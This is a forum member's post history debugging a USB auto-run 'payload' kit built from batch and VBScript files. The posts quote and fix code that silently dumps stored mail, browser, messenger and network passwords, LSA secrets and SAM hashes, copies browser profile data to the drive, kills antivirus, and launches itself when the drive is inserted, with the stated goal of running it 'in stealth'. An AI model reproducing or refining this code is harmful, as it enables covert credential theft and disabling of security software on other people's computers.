Jump to content

Tmbomber

Active Members
 View Profile  See their activity

  • Posts

    59

  • Joined

  • Last visited

 Content Type 

Everything posted by Tmbomber

  1. Tmbomber
    < sigh > wrong on both counts. It's late & I'm sleepy. I'll give it another look tomorrow. Night guys, & thanks Leapo for the Mad Props :)
  2. Tmbomber
    Ok, first blush... +----------------------------------+ + [Dump Network PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Mail PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Firefox PW] + +----------------------------------+ The system cannot find the path specified. ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump IE PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Messenger PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Cache] + +----------------------------------+ The system cannot find the path specified. ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump LSA secrets] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Product Keys] + +----------------------------------+ The system cannot find the path specified. &lt;my ip address wuz here&gt; ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump URL History] + +----------------------------------+ Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs". ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Updates-List] + +----------------------------------+ The system cannot find the path specified. &lt;my ip address wuz here&gt; ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Port Scan] + +----------------------------------+ The system cannot find the path specified. &lt;my ip address wuz here&gt; ----------------------------------------------------------------------------------------------------------------------------- This was done on an XP x64 machine. I had several small alert windows pop up saying "Error 5". Still digging into it. One note: Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs". referrs to: ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO + [Dump URL History] + &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 CSCRIPT //nologo %scriptdir%\DUH.vbs &gt;&gt; %log% 2&gt;&amp;1 This was working. I see you've added scriptdir. scriptdir is defined by: IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\") I'm using a u3 drive, so the else part is being used. I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\. I'm thinking all the "The system cannot find the path specified." are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%") I'm going to go try that now.
  3. Tmbomber
    Discovered something... netstat.exe -abn >> %log% 2>&1 The b option works on some OS's, but not on all. I tried it with and without and if it's available I think I wanna see the b output. Easy solution, do it twice: netstat.exe -an >> %log% 2>&1 netstat.exe -abn >> %log% 2>&1 Another thing I noticed... GonZor's payload launches all the password programs without opening windows... Hey GonZor... How'd ya pull that one off??? (presently trying to reverse engineer what ya did)
  4. Tmbomber
    Well... Implement the fixes I posted and disable IE PW, LSA secrets, mail PW, MSN Messenger PW, Network PW, and AVKILL and it runs in stealth. How about helping with the debugging???
  5. Tmbomber
    Yup, that was it. Now AVKill only opens one dos window and the log file is a lot cleaner... Other issues... On XP x64 Menu.bat still gives about four or five "No Disk" errors when you run it. This doesn't happen with standard XP. I don't get any "No Disk" errors with XP standard or x64 when the payload runs. Moved: :: Opens the logs folder IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv start /wait %flshdrv%\LOGS\ :SkipOpenDrv :: Opens the root of the drive folder IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt start /wait %flshdrv% :SkipOpenDrvRt To the bottom of the .bat file. That way the window opens when things are all done. There is a delay depending on what all you have turned on. but for stealth I'd have the "open window" feature turned off anyway. IF NOT EXIST %config%\Dump_Mail_PWP.cfg GOTO SkipMailPW ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO + [Dump Mail PW] + &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 %progdir%\mailpv.exe /stext %tmplog% &gt;&gt; %log% 2&gt;&amp;1 COPY %log%+%tmplog%* %log% &gt;&gt; NUL DEL /f /q %tmplog% &gt;NUL :SkipMailPW in the top line, Dump_Mail_PWP.cfg should be Dump_Mail_PW.cfg IF NOT EXIST %config%\Dump_Updates_List.cfg GOTO SkipUdateList ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 ECHO + [Dump Updates-List] + &gt;&gt; %log% 2&gt;&amp;1 ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1 %progdir%\wul.exe /stext %tmplog% &gt;&gt; %log% 2&gt;&amp;1 COPY %log%+%tmplog%* %log% &gt;&gt; NUL DEL /f /q %tmplog% &gt;NUL :SkipUdateList First line, Dump_Updates_List.cfg should read as: Dump_Update_List.cfg Dump Mail PW, Dump Network PW, Dump Messenger PW, and Dump LSA Secrets all open windows and need to be manually closed. Dump Firefox PW can't seem to find the Firefox directory on x64. I haven't checked it on standard XP yet. Here's a fun one... If you have Dump IE PW and Dump Messenger PW turned on, for some reason the tmplog isn't deleted at the end of Dump IE PW, if Dump Messenger PW doesn't generate output, the tmplog from Dump IE PW gets put in the Dump Messenger PW's output block. It seems the tmplog isn't being deleted on sever occasions. (I'm still trying to figure out why)
  6. Tmbomber
    A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat. (it explains why the beginning of my log file is so messed up) Here's the FOR loop from GonZor's GO.vbs: For Each objDrive in colDrives If objFSO.FileExists(objDrive.DriveLetter &amp; ":\System\SRC\drv.dat") Then strPath = objDrive.Driveletter &amp; ":" If objFSO.FileExists(strPath &amp; "\System\SRC\U3.dat") Then objShell.Run ".\LaunchU3.exe -a" End If If objFSO.FileExists(strPath &amp; "\System\SRC\PL.dat") Then objShell.Run ".\System\SRC\go.bat " &amp; strPath , 0, False End If End If Next and here's yours: For Each objDrive in colDrives If objFSO.FileExists(strPath &amp; "\SYSTEM\Start.bat") Then objShell.Run ".\SYSTEM\Start.bat " &amp; strPath , 0, False End If Next GonZor's got that launcher thing in there, but notice he sets the variable "strPath" in the third line. Yours uses it in the second line, but it's never set. I think this might work: For Each objDrive in colDrives strPath = objDrive.Driveletter &amp; ":" If objFSO.FileExists(objDrive.DriveLetter &amp; ":\SYSTEM\Start.bat") Then objShell.Run ".\System\Start.bat " &amp; strPath , 0, False End If Next I'll be giving it a try tomorrow night.
  7. Tmbomber
    Thank you for posting your update :) OK, more bug hunting in no particular order. For some reason, the beginning of my log files looks like: ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- + [Dump SAM FGDUMP] + +----------------------------------+ +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Firefox PW] + +----------------------------------+ Error : Firefox profile directory does not exist.. You have entered profile path = [\FirePassword.exe] FirePassword (Ver 2.0.1) : Firefox Username &amp; Password List Decryptor by Nagareshwar Y Talekar For latest version visit http://www.securityxploded.com. Usage : .\SYSTEM\PROGS\ [-m "master password" ] [Firefox_Profile_Directory] ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump IE PW] + +----------------------------------+ ================================================== Entry Name : xxx Type : xxx Stored In : xxx User Name : xxx Password : xxx ================================================== It's not even outputting: :: Logged modules :: Header information ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt; %log% 2&gt;&amp;1 ECHO Leapos Payload [Time Started: %date% %time%] &gt;&gt; %log% 2&gt;&amp;1 ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% &gt;&gt; %log% 2&gt;&amp;1 which confuses me quite a bit. (btw, notice that the first echo line there only has one > at the end of it) The "no disk" error still persists when running Menu.bat (at least on my machine), but doesn't happen when you're actually sticking the thumb drive in a machine. So good job there. Just noticed a minor one in Start.bat... :: NetScape Data mkdir %logdir%\%computername%\Slurp_Data\NetScape\ xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y :: Opera Data mkdir %logdir%\Slurp_Data\Opera\ xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y notice the difference in the mkdir lines. the one for netscape has an extra %computername% thrown in there, that creates an extra computername directory inside the computername directory. Netscapes mkdir line is the only one like it, so just removing the extra %computername%\ will clean up the log directory a bit. :: Checks to see if the payload is disarmed IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm IF EXIST %config%\Disarm_Payload.cfg GOTO End :SkipDisarm :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername% SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\") SET config="%flshdrv%\CONFIG\" I'm afraid we have another %config% being used before config is defined issue. Port scan appears to be dumping it's help file. I'm uncertain why. It appears to dump it's information to the templog file, then appends templog to the normal log file. I'd add a -v to "%progdir%\portqry -local -l %tmplog% >> %log% 2>&1" just to get more verbose output. Also for some reason a templog file is being left. It looks like it should be deleted, but for some reason it's left after the .bat file is done. I'll have to think on that one. AVKill still pops up the dos windows. (like 8 of them) I'm still unsure how to deal with that. For the time being I'm disabling AVKill and just manually turning off the AV before inserting the thumb drive. Three of the password recovery programs are popping up windows and not closing them. It's late & I don't remember which. I'll check that more tomorrow. And finally.... Running this on an XP x64 machine causes a lot of the programs to fail. I only wind up with about half the information. I'm looking into that one too.
  8. Tmbomber
    Actually, I was poking around a bit, trying a few changes... Of course, having start.bat restore itself kinda messes *that* up :)
  9. Tmbomber
    Hi, new to the fourm & have been playing with Leapo's payload. Noticed a few things in Start.bat... :: Performs a safety check. if the file safety.txt is found on the root of your C:\ drive, the payload will not run by default. IF NOT EXIST %config%\Safety_Check.cfg GOTO SkipSafetyCheck IF EXIST C:\safety.txt GOTO End :SkipSafetyCheck :: Finds the location of the flash partition and set master variable. @ECHO off IF EXIST ..\CONFIG\Test_Mode.cfg GOTO TestMode FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( IF EXIST %%i:\CONFIG\Drive_Location.cfg ( SET flshdrv=%%i:\ ) ) :: Sets Variables and paths IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername% SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\") SET config="%flshdrv%\CONFIG\" First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted. Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???) and Third, The multiple "No Disk" errors appear to be coming from the FOR loop. I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like: @ECHO on CD \System\SRC &gt;NUL :: SET LOG PATHS IF NOT EXIST %1\System\Logs\%computername% ( MD %1\System\Logs\%computername% ) SET logdir="%1\System\Logs\%computername% SET log="%1\System\Logs\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%1\System\Logs\%computername%\%computername%_TEMP.log" SET include="%1\System\SRC\Include SET /p eipurl=&lt;"%1\System\SRC\Include\EIP.dat" SET U3="%cd% Notice that he doesn't set a %flashdrv%, he's using %1 which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop. (Is there some reason you did it the way you did that I'm unaware of???) I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there seeing Menu.bat is only run when I wanna change the thumbdrive's configuration. Your csrss.exe is killing Avast alright, but for some reason is opening a lot of dos windows. I haven't figured that one out yet. BTW, is Start.bat restored from Backup.rar???
×
×
  • Create New...